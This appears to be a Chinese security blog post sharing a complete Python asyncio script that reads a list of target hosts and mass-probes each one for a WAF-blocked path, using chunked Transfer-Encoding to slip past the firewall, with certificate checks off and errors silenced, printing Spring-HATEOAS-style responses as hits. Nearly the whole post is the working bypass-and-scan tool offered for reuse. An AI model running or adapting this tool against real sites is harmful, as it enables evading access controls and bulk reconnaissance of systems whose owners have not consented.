关于某waf的路径拦截分块绕过脚本

前言:关于某waf的路径拦截绕过

之前挖掘漏洞的时候,遇到一种情况:WAF 会对指定的敏感路径进行拦截,但这里可以通过 chunked 分块传输编码绕过。当时资产中大量存在这种情况,于是写了一个并发脚本来进行批量探测。有时候需要用到却总是找不到,就想着直接保存在博客上面。

# coding=utf-8
# @Author   : zpchcbd HG team
# @Blog     : https://www.cnblogs.com/zpchcbd/
# @Time     : 2022-04-29 22:17

import asyncio
import aiohttp
import async_timeout

# gheaders = {'Transfer-encoding': 'chunked'}
# Path to a newline-separated list of target hosts/URLs to probe.
gFilename = './url.txt'
# The WAF-blocked path appended to every target URL (set before running).
gPyload = 'your_path'


def urlFormat(url, path=None):
    """Build the probe URL by joining *url* and *path*.

    Inserts a single '/' separator only when *url* does not already end
    with one, so the result never has a doubled or missing slash.

    :param url: base URL, e.g. ``https://host`` or ``https://host/``
    :param path: path to append; defaults to the module global ``gPyload``
    :return: the joined URL string
    """
    if path is None:
        path = gPyload
    sep = '' if url.endswith('/') else '/'
    return '{}{}{}'.format(url, sep, path)


async def A(session, url):
    """Probe one target through the shared *session*.

    Sends a GET with ``Transfer-Encoding: chunked`` (via ``chunked=True``
    plus a tiny body) to slip the blocked path past the WAF, then prints
    the target and response body when the Spring-HATEOAS-style marker
    ``{"_links":{"self":{"href"`` appears in the response text.
    Network errors are swallowed on purpose: this is a best-effort scan.
    """
    try:
        async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False,
                               data='0', allow_redirects=True) as response:
            body = await response.text()
            await asyncio.sleep(0.1)
            if '{"_links":{"self":{"href"' not in body:
                return
            print('-' * 30)
            print('[+] your_path, {}'.format(url))
            print('')
            print(body)
    except Exception:
        # deliberately silent — a dead host must not abort the batch
        pass


async def T(url):
    """Probe a single target with its own short-lived ClientSession.

    Same chunked-transfer bypass trick as ``A``, but parses the response
    as JSON and reports a hit when a top-level ``_links`` key is present
    (Spring-HATEOAS style responses). Errors — connection failures,
    non-JSON bodies — are silenced by design: this is a best-effort scan.

    NOTE(review): opening one session per URL is heavier than sharing a
    session (as ``A``/``B`` do); kept as-is to preserve behavior.
    """
    try:
        # async with async_timeout.timeout(2):
        async with aiohttp.ClientSession() as session:
            async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False, data='0', allow_redirects=True) as response:
                retJson = await response.json()
                await asyncio.sleep(0.1)
                # membership test on the dict directly is the idiomatic
                # (and cheaper) form of `'_links' in retJson.keys()`
                if '_links' in retJson:
                    print('[+] your_path, {}'.format(url))
                    print('')
                    print(retJson)
                    print('-' * 30)
    except Exception:
        pass
        # print('[-] curl {} error, the error is {}'.format(url, str(e)))


async def C(url):
    """Debug helper: fetch one target and dump the raw response body.

    Uses the same chunked-GET request shape as the other probes but does
    no matching — it always prints whatever came back, followed by a
    separator line. Exceptions propagate (no try/except here).
    """
    async with aiohttp.ClientSession() as session:
        async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False,
                               data='0', allow_redirects=True) as response:
            payload = await response.text()
            await asyncio.sleep(2)
            print(payload)
            print('-' * 30)


async def B():
    taskList = []
    urlList = list(set([x.replace('\n', '') if x.startswith('http') else 'https://' + x.replace('\n', '')
                        for x in open(gFilename, 'r', encoding='UTF-8').readlines()]))
    async with aiohttp.ClientSession() as session: # timeout=len(urlList) * 2
        for _ in urlList:
            taskList.append(A(session, _))
        await asyncio.gather(*taskList)


async def H():
    taskList = []
    urlList = list(set([x.replace('\n', '') if x.startswith('http') else 'https://' + x.replace('\n', '') for x in open(gFilename, 'r', encoding='UTF-8').readlines()]))
    for _ in urlList:
        taskList.append(T(_))
    await asyncio.gather(*taskList)


if __name__ == '__main__':
    # asyncio.run() supersedes the get_event_loop()/run_until_complete()
    # pattern (get_event_loop() is deprecated outside a running loop since
    # Python 3.10) and guarantees loop cleanup.
    asyncio.run(H())

posted @ 2022-10-17 15:36  zpchcbd  阅读(135)  评论(0)    收藏  举报